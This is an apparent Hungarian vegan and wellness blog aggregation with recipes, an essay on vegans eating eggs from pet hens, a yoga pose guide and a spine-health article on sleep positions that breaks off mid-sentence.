A répa a gyökeresek világában olyan, mint a köles a gabonák között. Számtalan jó hatása kevésbé ismert az emberek előtt. Az átlag emberek hogyan fogyasztanak répát? Húslevesben megfőzve. Itt az ideje, hogy más ételekként is beépüljön életünkbe, táplálkozásunkba. Ennek elősegítésére hoztam egy finom répasaláta receptet, amit akár kenyérre is tehetünk, így szendvicset készítve belőle, de fogyaszthatjuk fasírthoz, vagy más főételhez is társítva. Szeretném megismertetni a nyers sárgarépa fogyasztás néhány előnyét, elősegítve a nyers répa gyakoribb fogyasztását. Egyik nagy előnye, hogy koleszterint nem, rostokat viszont annál inkább tartalmaz. Ennek eredményeképpen segít az érrendszer tisztán tartását, az erekben lerakódó plakkok megelőzését. Így a rendszeresen nyers sárgarépát fogyasztók közt csökken a keringési betegségek kialakulásának esélye. K és C vitaminokban gazdag. A K vitamin vérképzésben és a csontok erősítéséhez szükséges. A C vitamin a fogak, az íny és a szövetek (pl. haj erősödése, bőr rugalmassága) egészségmegőrzésében vesz részt. Rostforrásként gyógyíthatja a refluxot, segítheti a székrekedés leküzdését. Rendszeres fogyasztása kismamáknak segíti a tejképződést, terhesség ideje alatt pedig a magzat fejlődését.
A recept:
Hozzávalók:
- 4 sárgarépa
- 2-3 dl növényi joghurt
- 5 kanál növényi majonéz
- 2 dl bögrényi fekete olívabogyó
- pár csipetnyi feketebors (opcionális)
Elkészítés:
A répákat meghámozzuk, megmossuk és nagy lyukú reszelőn lereszeljük. A joghurtot kikeverjük a majonézzel. Az olívabogyókat érdemes felaprítani. A sárgarépát és a majonézes joghurtot összekeverjük, hozzáadjuk az olívabogyókat. Mivel az olíva eleve sós, nem sóztam meg a répát. Viszont az egyik feléhez kevertem némi fekete borst. Anélkül is finom, enyhén megborsozva is eteti magát.
Mivel én elég sok mennyiséget készítettem, így nem csak salátaként, hanem kenyérrevaló amolyan szendvicskrémként is fogyasztottuk. Két kenyérszelet közé tettem, s így vittük a szendvicset a munkahelyre.
,,A tojás úgysem kell a tyúknak - avagy a ,,vegán állathasználat elmélete
Egyre többször futok bele a kérdésbe vegán körökben: ha hobbiból tartok egy tyúkot - sőt, esetleg egy örökbefogadott, mentett tyúkot! - és szeretem, akkor van-e jogom elfogyasztani az ő tojásait, amiket ,,amúgy is otthagyna? Az ilyen kérdések végére akár oda is biggyeszthetnénk a Karinthy-szófordulatot: És ha igen, miért nem? Mert a válasz igen is, meg nem is. Miért igen? Na, ez az a térfél, amelyik mellett vegán csoportokban különösen merész dolog érvelni. Mivel a veganizmus definíció szinten tartalmazza az állathasználat és az állati termékek elutasítását, ebből szükségszerűen következik, hogy a tojás sem etikus. A vita kedvéért vizsgáljuk meg ezt a nézőpontot is. Azzal, hogy az állathasználat nem vegán, senki sem akar vitatkozni. A valódi kérdés ebben az esetben az, hogy mi az, amit állathasználatnak tekintünk. Hogy jobban átlássuk az érmének ezt az oldalát, a saját életemből hoznék egy példát: újdonsült, de annál fanatikusabb macskásnéni lévén sokat böngészek macskás felszerelések, ajándéktárgyak, kreatív, ,,csináld magad dolgok után. Nemrégiben egy különös könyvbe futottam bele, melynek címe: Crafting with cat hair, azaz Kézművesség macskaszőrrel. Ítélkezést kezdd meg! :D Viccet félretéve: bennem komolyan felmerült a kérdés, hogy miután tavasszal úgyis annyit vedlik az én szemem fénye, vajon tényleg készíthetnék-e a borítón látható kis ujjbábokhoz hasonló cukiságokat a kihullott szőréből, és ha igen, az vegán dolog lenne-e. Mármint, állati termék? Igen. Okoz szenvedést bárkinek? Nem. Profitálok belőle? Pár egyedi dísztárgyat leszámítva nem. De tényleg, van külön fésűm hozzá, amivel össze tudom gyűjteni a szőrét, és amit egyébként is használok rajta, ergo maga a macska semmi újdonságon nem menne keresztül, az pedig szerintem magától értetődő, hogy az ember nem azért fogad örökbe egy kóbor macskát, hogy aztán cicaszőr kesztyűkkel menőzhessen - legalábbis remélem. Ezt az analógiát átvezetve a hobbityúkokra: ha egyébként is tojnak tojást, és nincsenek jóképű kakasok az életükben, tehát megtermékenyítetlen tojást tojnak, amivel nincsenek további szándékaik, mint otthagyni ahol éppen kiesett, van-e jogunk azokat összegyűjteni és megenni? Miért nem? Habár ez a nézőpont átlagosan sokkal népszerűbb az igenlőnél, számomra mégis nehezebb volt érvelni mellette. Ha nem fáj a tyúknak, és szeretetből tartom, a rántotta csak egy kedvező mellékterméke a helyzetnek, akkor miért ne (t)ehetném? Azért nem, mert azt senki nem tudja, nem fogja leellenőrizni, hogy tényleg nem fáj-e a tyúknak, és tényleg szeretetből tartod-e. Mert felveti a kérdést, hogy akkor a bio, szabadtartásos, humánus farmoknak is van-e akkor létjogosultságuk, holott erre már egy tökéletesen egyértelmű NEM a válasz. Ha elfogadjuk azt, hogy egy szeretett, hobbiból tartott állatot hasznosítunk, azzal legitimizáljuk az állathasználatot, csupán bizonyos feltételeket szabunk köré. Visszatérünk az állatjóléti megközelítéshez, az állatjogi helyett. Onnan pedig már csak egy lépés a bio tejüzem, ahol a kisbocik önként adják nekünk az anyatejüket, a házi sajtok, a kistermelői mézek, és a már sokat emlegetett házi tojás, ahol a ,,kiöregedett, egyre kevesebbet tojó tyúk a profit csökkenésével - minden bizonnyal természetes úton, végelgyengülésben - elhalálozik. És ha már úgyis ott van a húsa, ami ugye neki már nem kell... Le szeretném szögezni, nem feltételezem, hogy bármelyik felelős vegán támogatná a fentebb említett esetek legitimizálását. Kifejezetten az ellenkezője igaz. Éppen ezért fontos, hogy felismerjük a hasonló helyzetek mögöttes tartalmát, gesztus-értékét, súlyát, és nemet mondjuk az állathasználatra. Minden formájában. De hát akkor mit csináljak a tojással? Nagyon egyszerű: hagyd ott, ahol van. Talán elsőre furcsán hangozhat, de a tyúkok a legtöbb esetben előbb vagy utóbb megeszik a saját, megtermékenyítetlen tojásaikat. Ennek a jelenségnek az a magyarázata, hogy egy tyúknak ahhoz, hogy egy tojás kifejlődjön a szervezetében, relatíve sok kalciumot kell felhasználnia, különösen a tojás héjának megalkotásához. Ennél fogva, amíg egy fészekaljnyi tojást tojik, rengeteg kalcium távozik a szervezetéből, és ha látja, hogy a tojásai nem fognak kikelni - ebben a felismerésben segíthetünk neki, ha kicsit megrepesztjük vagy megtörjük őket - egész egyszerűen ,,visszaszerzi az elvesztett kalciummennyiséget, említett tojások elfogyasztásával. Összefoglalva tehát, ha a tyúkod folyamatosan tojja a felesleges tojásokat, egy darabig hagyd figyelmen kívül - miután végzett az általa várt mennyiséggel, abba fogja hagyni. Ha ez megtörtént, egy kis helyen megtörheted a tojásokat, finoman rávezetve Tyúkanyót, hogy ezeken már nem érdemes kotlania. Miután pedig feltalálta magát... nos, kívánj neki jó étvágyat! Petra Shura The post ,,A tojás úgysem kell a tyúknak - avagy a ,,vegán állathasználat elmélete appeared first on VegaNinja.
Krémes zabkása dióval és mazsolával
2016. április 11. Élj harmóniában
Krémes zabkása dióval és mazsolávalA zabkása az egyik legjobb reggeli étel, jó lendületet ad a szervezetednek. Gyorsan elkészíthető, tápláló, meleg, nem terheli meg az emésztést és kedvezően is hat az emésztésre (az agnira , az emésztés tüzére) . Összetételének függvénye, de a belerakott alapanyagoknak köszönhetően nagyon sok vitamint, ásványi anyagot, nyomelemet tudsz a szervezetedbe juttatni a nap indításához. Igazi jó kis energiabomba. Ráadásul nagyon jó arra is, hogy az édesség iránti vágyadat természetes módon csillapítsd. Jógatáborokban gyakran ez a reggeli, ott általában nem előre ízesítjük, hanem mindenki saját kedvére tehet bele finomságokat kókuszt, aszalt gyümölcsöket, nádcukrot, magvakat, karobot, kakaót és csak a képzeleted szabhat határt annak, mi mindent tudsz elképzelni a saját zabkásádban:). Gluténmentes diétában gluténmentes zabpehellyel készítsd el. hozzávalók 1 személyre 4 -5 púpos evőkanál zabpehely (kb. 1/3 bögre) 1 marék mazsola 1 marék dió fahéj vanília 1 tk. ghí vagy vaj (vagy kókuszzsír vegán változatban) 2,5 dl víz A diót és a mazsolát legjobb, ha éjszakára előtte beáztatod. Tegyél egy edényt a tűzhelyre, majd a zabpelyhet öntsd bele és kevergesd egy picit szárazon, majd öntsd hozzá a vizet és tedd bele a mazsolát és a diót. Forrald fel az egészet, majd tedd bele a fűszereket és a ghít. Főzd kis lángon krémesre. Ízlés szerint nyers nádcukorral ízesítheted még, ha édesebben szereted. Vegyszermentes (bio) alapanyagokat használj!
Curry-s édesburgonya ragu puliszkával
2016. április 8. Éltető ételek
Nagy kedvencem az édesburgonya, sütve, főve egyaránt finom. Az indiai fűszer kellően pikánssá teszi, a fokhagymás puliszka pedig jól kiegészíti. Egyébként, ha van kerted, te magad is tudsz batátát termeszteni. Nekem már szépen gyökereznek a palánták. :) Most pedig jöjjön a recept: Hozzávalók: - 1 evőkanál kókuszolaj - 1 vöröshagyma - kb. 1 cm-es gyömbér - 2-3 gerezd fokhagyma - 1 szép nagy édesburgonya - 20 dkg zöldborsó - 4-5 rózsa brokkoli, a szárával együtt - 1 doboz zabtejszín - 1 evőkanál zabliszt - himalája só, bors, curry fűszerkeverék, chili Elkészítése: A kókuszolajon megpároljuk a vöröshagymát, hozzáadjuk a reszelt gyömbért, a lereszelt fokhagymát és a fűszereket. Néhány percig kevergetjük, majd beletesszük a kockára vágott édesburgonyát, a zöldborsót és a kis kockára vágott brokkolit torzsát.Lefedve kb. 10 percig főzzük, majd hozzáadjuk a brokkolirózsát is. A végén a tejszínhez hozzákeverjük a zablisztet, majd ráöntjük a ragura.Ha szükséges, akkor a végén még ízesíthetjük. A kukorica puliszka receptjét itt találod.
Sült wasabis csicseriborsó
Még két év, és lesznek, akik karácsonykor vietnami pacskerben indulnak el éjféli misére, de ismétlem, NINCS globális felmelegedés! A mai (pontosabban tegnapi) időjárás hatására hajszál híján nekiálltam jégbe hűtött dinnyelevest szervírozni lángossal és főtt kukoricával, mikor eszembe ötlött valami: az ízek miféle egzotikus harmóniáját lehetne létrehozni azáltal, ha ötvözném az arab és a japán konyha ízvilágát. Most, hogy ezt is sikerült leírni röhögés nélkül, jöjjön az igazság: megláttam egy zacskó wasabis mogyorót. Az meg kész mázli volt, hogy ez a kompozíció tökéletesen működött sült csicseriborsóval is! Komponensek: 400 g csicseriborsó (Konzerves, de aki áztatgatni akarja, nem akadályozhatom meg benne. Mindenkinek szüksége van ingergazdag hobbira.) 2 tk wasabi fűszerpor 3 ek olívaolaj 1 ek rizs- vagy fehérborecet só, bors Az összetevőket egy ún. tálban összekeverjük, majd 40 percre 220 fokra melegített sütőbe suvasztjuk. És mivel ebben a formában kiábrándítóan rövid a recept, elárulom, hogy wasabi helyett használhatjuk pl. füstölt fűszerpaprika és fokhagymapor elegyét is, csak ez esetben légyszíves mellőzzük az ecetet! Ja, és a Völlinger Kati néni délután megszédült a lépcsőházban, de már jobban van. Én meg felvételiztem az agráregyetemre, de már az első vizsgán ELKASZÁLTAK. Végezetül pedig egy gasztronómiai dogma: az élesztő majdnem tökéletes antitézise a halastó. (Na, így már rendben van terjedelemre.)
Pirított, párolt gyümölcsök - ideális ájurvédikus reggeli vagy édes csemege
2016. április 1. Élj harmóniában
Pirított, párolt almaA párolt, pirított gyümölcsök ideálisak napindító étkezésnek vagy olyankor amikor az ember csak egy kis édességre vágyna pl. ebéd után. A leginkább ideális gyümölcsök az alma, körte, sárgabarack, őszibarack, nektarin, banán és a bogyós gyümölcsök, datolya, füge. Mivel 15 éve bio ételeket fogyasztok mindig leírom, hogy vegyszermentes (bio) alapanyagokat használj, a gyümölcsöknél kiemelten figyelj rá, hogy ne vegyszeres, szennyezett gyümölcsöt fogyassz. A párolt gyümölcsöket kedvedre tudod fűszerezni. Ideális fűszerek fahéj, gyömbér, szegfűszeg, kardamom, ánizs, szerecsendió. Tehetsz hozzá aszalt gyümölcsöket és magféléket is. Kísérletezz a pirított, párolt gyümölcsök készítésével bátran:) Ma párolt almát készítettem mandulával - ami nagyon tápláló kombináció. (A mandula áldásos hatásairól itt olvashatsz) Az alma nyersen sokaknál okoz problémát, puffadás, kellemetlen hasi tüneteket. Főzve minden testtípus számára ideális táplálék. Hozzávalók 1 tk. ghí (vegán változatban kókuszzsír) 2 bögre kockákra vágott alma (vagy bármilyen gyümölcs) 2 ek. víz 1/2 tk. fahéj 3 szegfűszeg 1 tk. reszelt gyömbér kis marék mazsola 20 szem héjától megtisztított mandula Melegítsd fel a ghít egy edényben, majd szórd bele a szegfűszeget és a gyömbért, forgasd meg egy picit. Tedd hozzá a gyümölcsöket. Süsd kb. 2 percig. Majd add hozzá a vizet, a fahéjat, a mazsolát és a mandulát és párold néhány percig. Ha úgy érzed, hogy nagyon elpárolgott a nedvesség, akkor tehetsz hozzá még egy kis vizet. Figyelj rá, hogy a gyümölcs puha legyen, de ne főzd szét. Én nem szoktam pluszba édesíteni, de ha szükségesnek érzed tálalás előtt datolyasziruppal édesítheted még.
Kókuszos zabkása (vegán)
2016. március 30. Zizi kalandjai
Húsvét után egy kis reggeli indító. Egy újabb kása, ami krémes, lágy és kókuszos. Csak azért nem hófehér a színe, mert datolyasziruppal van édesítve (mostanában ezt használjuk édesítésre) és a kásáinkat rózsaszínesre “festi”.
A kása kókuszos ízét a kókusztejpor adja. Nem, nem gyerekkorunk fura ízű fehér porát használtam, hanem egy kiváló minőségűt, amiből nagyon jó ízű zsíros kókusztej is készíthető, ha vízzel összekeverjük. A kókusztejpor előnye, hogy ha felbontjuk és marad belőle, akkor nem romlik meg olyan gyorsan, mint a tej. De utazásokra is magunkkal vihetjük és gyorsan készíthetünk belőle kókusztejet, amit felhasználhatunk a reggelinkhez (kása, turmix, kávé) vagy egy jó kis curry készítéséhez. Én a kásába most csak simán belekevertem, de kipróbáltuk már vízzel hígítva és kávéba keverve is finom volt.
Kókuszos zabkása (vegán)
Hozzávalók 3 főre:
– 12 evőkanál zabpehely
– 2 és 1/2 bögre mogyorótej (zabtej, rizstej, mandulatej, szójatej is használható)
– 2 evőkanál kókusztejpor
– 1 evőkanál mandulavaj (kesudióvaj, földimogyoróvaj is használható)
– 4 teáskanál datolyaszirup (juharszirup, szilvaszirup is használható)
– 2 teáskanál extra szűz kókuszzsír
– 1 vaníliarúd kikapart magjai
– tálaláshoz: kókuszchips, hántolt kendermag, dió, amit szeretnénk
(A recepthez használt bögre 250 ml-es.)
Tegyük egy lábasba a zabpelyhet, öntsük fel a mogyorótejjel és alacsony lángon kezdjük el főzni folyamatos kevergetés mellett. 5-6 perc után adjuk hozzá a vaníliát, a kókusztejport. 2 perc múlva keverjük hozzá a datolyaszirupot és a mandulavajat. Főzzük még kb. 5 percig, amit krémes, kása állagú lesz. Zárjuk el alatta a gázt és adjuk hozzá a kókuszzsírt. Jól keverjük el.
Tálaljuk kókuszchips-szel, kendermaggal.
Tégy a gerinced egészségéért! - Vírabhadrászana 1. (Harcospóz 1.)
2016. március 29. Élj harmóniában
Vírabhadrászana 1. (Harcospóz 1.)A harcos pózok, vagy más néven hősi pózok a fizikai test szintjén megerősítik a stabilizáló izmokat - erősítik a láb izomzatát, medence körüli izomzatot, mély hátizmokat. A hősi pózok fejlesztik a magabiztosságot , határozottságot, kitartást. A hősi pózok rendszeres gyakorlása növeli az önbizalmadat is. Vírabhadrászana 1. (Harcospóz 1 .) nagyon jól erősíti a láb izomzatát, b okákat és a térd körüli izomzatot, combokat - segít helyreállítani a talpboltozati rendellenességeket és sokat segíthet a térd problémáknál is. Ez egy kiváló tartásjavító jógapóz, mert erősíti a stabilizáló izmokat. A hősi póz 1 oldja a hátfájást és a deréktáji fájdalmakat, lumbágót is. E rősíti a szívet, javítja a keringést. M ellkasnyitó hatásának köszönhetően serkenti a tüdő munkáját is. A nyak és vállöv megfelelő munkájával jól kompenzálja, az ülő munka és a görnyedés következtében kialakult erőlehelyezett fejtartást. Hogyan végezd el? - Állj meg összezárt lábakkal - Tádászanában (hegytartásban) - Lépj hátra egy nagy terpeszbe - és a lábaid középső tengelye legyen párhuzamos egymással. - A jobb lábfejedet fordítsd el teljesen (kb. 90 fok) majd a bal lábfejedet is fordítsd el kicsit jobbra (kb. 40-45 fok) úgy hogy a sarkad hátrébb kerüljön mint a lábujjaid. - A jobb lábad sarkától, ha húzol egy képzeletbeli vonalat kb. a bal lábfejedet középen metszi. - Fordulj a medencéddel a jobb lábad irányába - ha nagyon nehezen tudod a medencédet előre fordítani, akkor a hátul lévő bal lábaddal egy lábfejnyit lépj ki a matrac bal széle felé. Mindkét lábad legyen aktív. - Majd hajlítsd be a jobb térded - ha tudod annyira menj mélyre, hogy a combod párhuzamos legyen a talajjal. A lábszárad legyen merőleges a talajra és a térded a bokád fölé kerüljön. - A medencédet tartsd stabilan - aktív a hasizom, farizom. és nyújtóz z hosszan az egész gerinceddel fölfelé. - Emeld minkét karod a magasba a fejed fölé - a tenyerek nézzenek szembe egymással. A két karod és a fülek egymás mellett, egy vonalban maradjanak. Kijövetel a pózból kilégzéssel engedd le a karokat, majd nyújtsd a térded. Forgasd be a lábfejeket középre és végezd el a gyakorlatot a másik oldalra is. A gyakorlat végén a kiindulási pózban (hegytartásban) pihenj meg. A kitartás alatt tartsd stabilan a lábaidat, nyomd a külső talpéleket és a nagylábujjad tövét a talajba és próbáld megtartani a belboka területét. Figyelj rá, hogy a térded ne billenjen befelé - végig maradjon a bokád fölött. A hátul lévő lábad külső talpélét próbáld lenyomni a matracba és ebből a letolásból próbáld meg nyújtani a lábad. Ha a combod még nem bírja, akkor ne menj annyira mélyre a pózba. Törekedj rá, hogy a z arc, mellkas, medence térd egy irányba nézzen. A törzsedet tartsd stabilan és szegycsonttal és fejtetővel nyújtózz fölfelé. A hasadat, derék táji szakaszt, medencédet tartsd végig stabilan. A picit behúzott farokcsontb ól nyújtózz az egész gerincoszloppal folyamatosan. Belégzéssel próbálj nyújtózni fejtetővel, szegcsonttal, nyisd a mellkast (távolítsd a kulcscsontokat egymástól), kilégzéssel told a talpakat a talajba és a válladat görgesd hátrafelé, lefelé, hogy a lapockák alsó csücskei közelítsenek egymáshoz. - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Ne végezd a jógapózt, amennyiben szívproblémád vagy tüdőtágulatod van. Magas vérnyomás esetén a karokat ne emeld a levegőbe. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. J ó gyakorlást kívánok:) szeretettel: Kati
Kókusznyuszi mangókrémmel (gluténmentes, laktózmentes, tojásmentes, vegán) és egyéb ötletek a húsvéti asztalra
2016. március 25. Zöld Avocado
kókusznyuszi mangókrémmel (mindenmentes, vegán) Jön a nyuszi! :-) Hangzik a gyerekszájból. A felnőttek szerint pedig itt a Húsvét. :-) Egy tudatosan táplálkozó vegetáriánusnak kihívás lehet a húsvéti menü összeállítsa, hiszen a hagyományos ünnepi ételek nem igen férnek bele egyik kategóriába sem. Vegetáriánus? Nem. Egészséges és könnyen emészthető? Nem. És ezt még csak fokozza, ha a családban, vagy a vendégségbe várt látogatók között akad gluténérzékeny, laktózérzékeny, tojásmentesen étkező, diétázó, fogyokúrázó, vagy akár vegán. Nem egyszerű kihívás, de megoldható! Vegán, és ún. "mindenmentes" ételeket is készíthetünk csodaszép színekben, lenyűgöző tálalásban és a szem után a nyelvbimbókat is sikerül elcsábítanunk az ízekkel. Szeretnétek egy-két ötletet ehhez? Akkor jó helyen jártok! Korábban, ez alkalomból már készítettem itt a Zöld Avocado vegetáriánus gasztroblogon színes húsvéti tojások helyett színes és gyümölcsös "kókusztojásokat", melyeket könnyedén elkészíthetünk a gyerekekkel közösen is. Nagyon jó kis meglepetés a húsvéti locsolóknak is az alternatív, színes "húsvéti tojás". :-) Itt található hozzá a recept. gyümölcsös kókuszgolyók / kókusztojások (mindenmentes, nyers vegán) Főételnek a friss ropogós saláták mellé répaformájú sárgarépafasírtokat ajánlanék, melyek a reggeliző asztalon is megállják a helyüket. Látványos, finom és egyszerűen elkészíthető. Itt található hozzá a recept. édesburgonyás sárgarépafasírt (mindenmentes, vegán) Ha pedig már van tojásunk, és répánk is, már csak a nyuszi hiányzik. Nem vagyok híve az állatformájú ételeknek, de ezt megláttam, és megszerettem. Ennek nem tudtam ellenállni! ;-) Természetesen az eredeti "nyuszi" kicsit élethűbb volt, mint az enyém, de azért gondoltam megosztom veletek az ötletet még így gyorsan húsvét előtt, hátha nektek szebben sikerül. Én meg majd még dolgozom a kinézetén, és jövőre megszépítem. Sokat agyaltam a végén, hogy miért is nem néz ki úgy, ahogy az én fejemben kinézett... majd telefonos segítséget kértem, és megkaptam a választ. Nem elég kerek a nyuszi feneke. Én folyamatosan az arcán kerestem a hibát, de közben tényleg! Az arca mögötti rész a lényeg! A nagy kerek fehér fenék hiányzik az arca hátteréből. :-D (Bár azért szerintem az arcforma is kicsit fura...) Majd jövőre! ;-) kókusznyuszi mangókrémmel (mindenmentes, vegán) Megosztom veletek a gluténmentes, laktózmentes, tojásmentes, vegán, trópusi kókusznyuszi receptét, a kivitelezéshez pedig ezen az oldalon találhatjátok a fázis fotókat. (Mert a forma ötlet innen jött, én pedig készítetem hozzá egy könnyen emészthető, diétákba is beilleszthető tésztát és krémet.) Talán nektek majd szebben sikerül! Drukkolok! ;-) Megint bebizonosodott, hogy maradjak a főzésnél, és a cukrászkodást bízzam másra. mangókrém aszalt mangóbólHOZZÁVALÓKtortalaphoz: - 50 g darált mandula / mandulaliszt - 100 g kókuszliszt - 100 g rizsliszt - 80 g kókuszcukor (egyéb tetszés szerinti édesítőszer) - 1/2 tk szódabikarbóna - 1 db citrom reszelt héjja (kezeletlen héjú) - csipet Himalája só - 2 dl kókuszjoghurt (egyéb tetszés szerinti növényi joghurt) - 4 dl mandulatej (egyéb tetszés szerinti növényi tej) - 3 ek kókuszolaj kókuszoskrémhez: - 250 ml - 2 ek kókuszkrém (Cocomas) - 3 ek + szóráshoz kókuszreszelék - 1 ek útifűmaghéj mangóskrémhez: - 30 g aszalt mangó (előző éjszakára beáztatva vízbe) - 2 ek a kókuszkrémből (Cocomas) dekorációhoz (arc és láb): - natúr kesudió, aszalt mangó, aszalt mazsola vagy áfonya, aszalt szilva, kókuszchips kókuszos süti mangókrémmel (mindenmentes, vegán) ELKÉSZÍTÉSKészítsünk egy alap tortát. Ehhez a szilárd és a folyékony összetevőket külön-külön keverjük ki, majd borítsuk egybe, és keverjük el alaposan. Elég szilárd, masszaszerű tésztát fogunk kapni, de ez így jó. Öntsük a kilisztezett tortaformánkba, ami nálam egy 17 cm átmérőjű kapcsos tortaforma volt. Tegyük a 180°C-ra előmelegített sütőbe, és kb. 40 perc alatt süssük készre. Nem kell tűpróba, mert ennek a tésztának a közepe melegen még kissé ragacsos, nem lesz száraz. (Erre van most szükségünk.) Hagyjuk kihűlni a formában, majd vegyük ki, és kezdjük el felhasználni az alábbi linken található fázisfotók alapján. Ide katt: Favoritblog A mangós krémhez (amivel megkenem a torta közepét) előző éjszakára beáztattam az aszalt mangókat, melyek csodaszépen megszívták magukat, és újra puhák lettek. Ezeket a - puha, ázott, de nem olyan lédús, mint a friss - mangókat 2 evőkanál kókuszkrémmel összeturmixolom, majd rákenem a kettévágott tortalapra. A külső kókuszkrémhez a kókuszkrémet kikeverem 3 evőkanál kókuszreszelékkel, és 1 evőkanál útifűmaghéjjal. Félreteszem 30 percre, hogy az útifűmaghéj elvégezhesse a dolgát, és megkeményedjen a hab. Miután összeállítottuk a nyuszi formát a mangókrémes tortánkból (lásd. a csatolt oldalon a fázisfotókat) megkenjük az egészet ezzel a kókuszkrémmel, majd megszórjuk az egészet egy kevés kókuszreszelékkel, ami a nyuszi szőrét fogja adni. A nyuszi arcához és lábujjaihoz is természetes hozzávalókat használtam. A fülei aszalt mangók, az orra és a szemei aszalt mazsolák / áfonyák, a bajusza aszalt szilvából vágott csíkok, a foga pedig kókusz chips. A lábujjai helyén kesudió van. Betesszük a hűtőbe a kész kókusznyuszinkat pár órára, és kész is. Nem is volt olyan bonyolult, ugye? Nektek, hogy sikerült? Elégedettek vagytok a végleges formával? És a gyerekek? :-) kókusznyuszi mangókrémmel (mindenmentes, vegán) Táplálkozz ne csak étkezz még Húsvétkor is! ;-) Megjegyzés: Azoknak, akiket zavar az állatra emlékeztető küllem, ajánlom, hogy készítsék el a trópusi kókusztortát hagyományos tortaformában, mert ízre nagyon finom a végeredmény. ;-) KELLEMES HÚSVÉTI ÜNNEPEKET, GYOMORBARÁT, ÖRÖMTELI ÉTKEZÉSEKET ÉS VIDÁM CSALÁDI PILLANATOKAT KÍVÁNUNK MINDENKINEK! :-)
Cukormentes diós banánkenyér (vegán)
2016. március 24. Zizi kalandjai
Valaki kérdezte a minap, hogy hogyan tudok két gyerek mellett fotózni és blogolni. Hááááááát… két kézzel lavírozok az élet útvesztőjében, egyik karomon nyöszörgő baba, a másik kezemben fényképezőgép, a lábamon pedig csüng egy majdnem három éves. Ha ezt a képet elképzeltétek, remélem nevettetek egy jót. Alkalmanként van segítségem, ilyenkor több időt tudok szánni a fotózásra, kb. 10 percet. Ha nincs segítségem, akkor 2 perc marad a fotózásra, ilyenkor a csodaszép fotózási kellékeimet sem tudom elővenni… fotózok sima hétköznapi evőeszközzel, tányérral – amiben megesszük az ételt – és már esszük is az ebédet, hogy minél hamarabb végezzek, mielőtt felébred Ákos (ha éppen alszik). A habzsolás művészetét gyakorlom nagyon sok esetben, nincs idő elmélkedő rágcsálásra (pedig ez lenne az egészséges). A szoptatás miatt sokat eszem, így igyekszem minél gyorsabban és minél többet megenni, ez most a cél.
Szóval én így csinálom: főzés, sütés, fotózás napközben, blogolás pedig éjszakába nyúlóan. Nem tudom, mások hogyan csinálják? Írjátok meg nekem! Tanuljunk egymástól!
Régebben sütöttem ezt a banánkenyeret, mert kíváncsi voltam, hogy milyen lesz, ha tényleg mindenféle édesítő nélkül készítjük el. Ezen kenyér édes ízét csak a banánok és a frissen facsart narancslé adják. Nagyon édes szájúaknak egyáltalán nem lesz édes, aki a kevésbé édeshez van szokva, annak pedig édeskés lesz. Állagra és ízre is azonban puha és finom, kiváló tea, kávé mellé reggelire, uzsonnára vagy bármikor nassoláshoz. Mivel egyáltalán nincsen benne édesítőszer, ezért babáknak is jó egy-másfél éves kor után, akik már esznek diót, ami egyébként el is hagyható a kenyérből.
Alaprecept innen, jó pár dolgot módosítottam rajta, többek között vegánosítottam.
Még több banánkenyér: itt.
Cukormentes diós banánkenyér (vegán)
Hozzávalók:
– 3 db érett banán, meghámozva, villával pépesre törve
– 1/3 bögre frissen facsart narancslé
– 3/4 bögre tönköly fehérliszt
– 3/4 bögre teljeskiörlésű tönkölyliszt
– 2 evőkanál lenmag
– 6 evőkanál víz
– 1 teáskanál szódabikarbóna
– 1 teáskanál foszfátmentes sütőpor
– 1/2 teáskanál őrölt fahéj
– 1/2 bögre dió, felaprítva
– 1 vaníliarúd kikapart magjai
– 1 db narancs reszelt héja (opcionális)
Egy kis tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni 6-8 percig, amíg zselés állagú lesz (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra.
Tegyük egy tálba a pépesre tört banánokat. Öntsük hozzá a narancslevet. Adjuk hozzá a fahéjat, a vaníliát, a naracshéjat, a lenmagos vizet és jól keverjük el. Ezután adjuk hozzá a száraz hozzávalókat: tönköly fehérliszt, teljeskiörlésű tönkölyliszt, szódabikarbóna és sütőpor. Jól dolgozzuk össze a tésztát, majd tegyük bele az aprított diót. Ezzel is keverjük el.
Az összekevert tésztát öntsük egy 25 cm hosszú szilikon püspökkenyér formába (ha nem szilikont használtok, béleljétek ki sütőpaprírral). Süssük az előmelegített sütőben kb. 40-45 percig (végezzünk fogpiszkáló próbát, hogy jól átsült-e a kenyér, akkor jó, ha a fogpiszkálóra már nem ragad semmi).
Tégy a gerinced egészségéért! - Egészséges alvási pozíciók
2016. március 23. Élj harmóniában
A blogon már több cikket olvashattál, melyek a gerinced egészségének megőrzéséhez nyújtanak segítséget - praktikus tanácsok, hétköznapi életbe beépíthető módszerek, vagy éppen jógagyakorlatok. A mai bejegyzéssel az alvást szeretném körbejárni a gerinc egészsége szempontjából. Egy későbbi cikkben a pihentető alvásról, az alvászavarok megszüntetéséről is részletesen olvashatsz majd. Sajnos a lakosság jelentős része küzd gerincproblémákkal, hátfájással, derékfájdalommal, nyaki problémákkal. Ez elsődlegesen helytelen életmódnak köszönhető. A modern kori ember keveset mozog, és azt sem a gerinc egészségének megfelelően. Helytelenül ülünk, állunk, nem tudjuk, hogyan kell helyesen lehajolni. és bizony azt sem tudjuk, hogyan feküdjünk egészségesen. Gondolj csak bele, ha 8 órát alszol naponta, akkor 60 éves korodig 20 évet töltöttél alvási pozícióban - ezért nagyon nem mindegy, milyen pozícióban töltöd az éjszakáidat. Bár mindannyian alszunk éjszaka, mégsem mindenki ébred kipihenten, frissen, fájdalmak, nehézségérzet nélkül. Az éjszakai alvás célja, hogy kipihend magad és feltöltődj energiával. Sokan reggelre hátfájdalmakat, nyaki fájdalmakat éreznek és összetörten ébrednek, szinte fáradtabbak, mint amikor lefeküdtek. Ennek egyik oka a helytelen életmód, helytelen táplálkozás - erről több korábbi cikkben is írtam már. Továbbá nagy szerepe van a reggeli ébredésedben annak is, hogy megfelelő pozícióban, megfelelő matracon alszol-e az éjszaka folyamán. A gerinc egészségének megőrzésében elsődlegesen a prevenciónak van nagy szerepe. A cél, hogy ki se alakuljanak a problémák - ha időben átalakítod életmódodat és odafigyelsz, a gerinced egészségét meg tudod őrizni. Ha már van kialakult problémád, akkor a legjobb, amit tehetsz, hogy minimalizálod a további romlást és próbálsz javítani egészségügyi állapotodon - megfelelő életmód, táplálkozás, testmozgás kialakításával. Az éjszakai alvás nagyon fontos a gerinc egészségének megőrzése szempontjából is - egy korábbi cikkben részletesen írtam a porckorongok egészségéről itt olvashatod- ezért nagyon fontos, hogy 